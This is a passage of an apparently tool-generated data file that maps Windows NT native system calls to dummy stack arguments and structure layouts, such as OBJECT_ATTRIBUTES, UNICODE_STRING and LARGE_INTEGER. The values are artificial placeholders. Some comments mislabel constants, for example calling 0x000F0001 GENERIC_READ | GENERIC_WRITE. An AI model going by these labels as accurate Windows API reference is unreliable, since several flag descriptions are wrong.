\"fields\": [\r\n {\r\n \"fieldName\": \"Data1\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x12345678\",\r\n \"fieldComment\": \"Example GUID Data1\"\r\n },\r\n {\r\n \"fieldName\": \"Data2\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x9abc\",\r\n \"fieldComment\": \"Example GUID Data2\"\r\n },\r\n {\r\n \"fieldName\": \"Data3\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0xdef0\",\r\n \"fieldComment\": \"Example GUID Data3\"\r\n },\r\n {\r\n \"fieldName\": \"Data4\",\r\n \"fieldType\": \"UCHAR[8]\",\r\n \"fieldValue\": \"0x1122334455667788\",\r\n \"fieldComment\": \"Example GUID Data4\"\r\n }\r\n ]\r\n },\r\n \"struct53\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"20 bytes (10 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes buffer\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0030\",\r\n \"fieldComment\": \"Pointer to buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtRollBackComplete\": {\r\n \"ntFunc\": \"NtRollBackComplete\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER TmVirtualClock (None, not used in typical call)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Pointer to LARGE_INTEGER specifying a virtual clock value, often None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRollBackEnlistment\": {\r\n \"ntFunc\": \"NtRollBackEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER TmVirtualClock (None, not used in typical call)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Pointer to LARGE_INTEGER specifying a virtual clock value, often None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000bcde\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRollBackTransaction\": {\r\n \"ntFunc\": \"NtRollBackTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Wait (TRUE, wait for rollback to complete)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cdef\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRollforwardTransactionManager\": {\r\n \"ntFunc\": \"NtRollforwardTransactionManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER TmVirtualClock (None, not used in typical call)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Pointer to LARGE_INTEGER specifying a virtual clock value, often None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000def0\",\r\n \"additionalComment\": \"HANDLE TmHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationEnlistment\": {\r\n \"ntFunc\": \"NtSetInformationEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG EnlistmentInformationLength (16 bytes, typical small info structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID EnlistmentInformation (dummy pointer, points to info buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass (EnlistmentBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000ef01\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationResourceManager\": {\r\n \"ntFunc\": \"NtSetInformationResourceManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ResourceManagerInformationLength (16 bytes, typical for a small structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ResourceManagerInformation (dummy pointer, could be a structure or buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ResourceManagerInformationClass (ResourceManagerBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE ResourceManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationTransaction\": {\r\n \"ntFunc\": \"NtSetInformationTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"TransactionInformationLength (32 bytes, typical for a structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to TransactionInformation (dummy pointer, could be a structure or buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"TransactionInformationClass (TransactionPropertiesInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000dcba\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationTransactionManager\": {\r\n \"ntFunc\": \"NtSetInformationTransactionManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000018\",\r\n \"additionalComment\": \"TransactionManagerInformationLength (24 bytes, typical for a structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to TransactionManagerInformation (dummy pointer, could be a structure or buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TransactionManagerInformationClass (TmBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE TmHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSinglePhaseReject\": {\r\n \"ntFunc\": \"NtSinglePhaseReject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer, often None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct54\",\r\n \"structureValueExpectations\": \"64-bit integer representing a virtual clock value.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct54\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x01d7e6a5b4000000\",\r\n \"fieldComment\": \"Sample virtual clock value\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtStartTm\": {\r\n \"ntFunc\": \"NtStartTm\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtThawRegistry\": {\r\n \"ntFunc\": \"NtThawRegistry\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtThawTransactions\": {\r\n \"ntFunc\": \"NtThawTransactions\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtDrawText\": {\r\n \"ntFunc\": \"NtDrawText\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING Text (None, no text to draw)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtTraceControl\": {\r\n \"ntFunc\": \"NtTraceControl\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PULONG ReturnLength (None, not requesting return length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG __OUTBufferLen (zero, no output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID __OUTBuffer (None, no output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG InBufferLen (zero, no input buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID InBuffer (None, no input buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG FunctionCode (zero, no operation specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetWnfProcessNotificationEvent\": {\r\n \"ntFunc\": \"NtSetWnfProcessNotificationEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Unknown1 (None handle, default/unused)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationVirtualMemory\": {\r\n \"ntFunc\": \"NtSetInformationVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG VmInformationLength (example: 32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to VmInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to MEMORY_RANGE_ENTRY array (dummy pointer)\",\r\n \"structurePointer\": \"MEMORY_RANGE_ENTRY\",\r\n \"structureRef\": \"struct55\",\r\n \"structureValueExpectations\": \"Array of MEMORY_RANGE_ENTRY structures describing memory ranges.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG_PTR NumberOfEntries (example: 1 entry)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass (example: VmPrefetchInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct55\": {\r\n \"type\": \"MEMORY_RANGE_ENTRY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"VirtualAddress\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00400000\",\r\n \"fieldComment\": \"Start address of memory range\"\r\n },\r\n {\r\n \"fieldName\": \"NumberOfBytes\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"Size of memory range (4 KB)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenPrivateNamespace\": {\r\n \"ntFunc\": \"NtOpenPrivateNamespace\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to BoundaryDescriptor (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"BoundaryDescriptor structure or buffer.\",\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct56\",\r\n \"structureValueExpectations\": \"OBJECT_ATTRIBUTES for the namespace object.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (example: GENERIC_READ | GENERIC_WRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE NamespaceHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct56\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreatePrivateNamespace\": {\r\n \"ntFunc\": \"NtCreatePrivateNamespace\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to BoundaryDescriptor (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"BoundaryDescriptor structure or buffer.\",\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct57\",\r\n \"structureValueExpectations\": \"OBJECT_ATTRIBUTES for the namespace object.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (example: GENERIC_READ | GENERIC_WRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to HANDLE NamespaceHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct57\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDeletePrivateNamespace\": {\r\n \"ntFunc\": \"NtDeletePrivateNamespace\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE NamespaceHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReplacePartitionUnit\": {\r\n \"ntFunc\": \"NtReplacePartitionUnit\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (example: 1, e.g. REPLACE_PARTITION_UNIT_FLAG_NONE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SpareInstancePath (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct58\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the spare partition instance path.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING TargetInstancePath (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct59\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the target partition instance path.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct58\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length in bytes (example: 16 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0022\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00a0\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct59\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length in bytes (example: 16 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0022\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00b0\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSerializeBoot\": {\r\n \"ntFunc\": \"NtSerializeBoot\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtOpenKeyTransacted\": {\r\n \"ntFunc\": \"NtOpenKeyTransacted\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (None, default for no transaction)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (None, default for root key)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"DesiredAccess (KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE KeyHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenKeyTransactedEx\": {\r\n \"ntFunc\": \"NtOpenKeyTransactedEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (None, default for no transaction)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"OpenOptions (REG_OPTION_OPEN_LINK)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct60\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"DesiredAccess (KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE KeyHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct60\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0060\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtFreezeRegistry\": {\r\n \"ntFunc\": \"NtFreezeRegistry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000000A\",\r\n \"additionalComment\": \"Time_OutInSeconds (10 seconds)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateKeyTransacted\": {\r\n \"ntFunc\": \"NtCreateKeyTransacted\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": 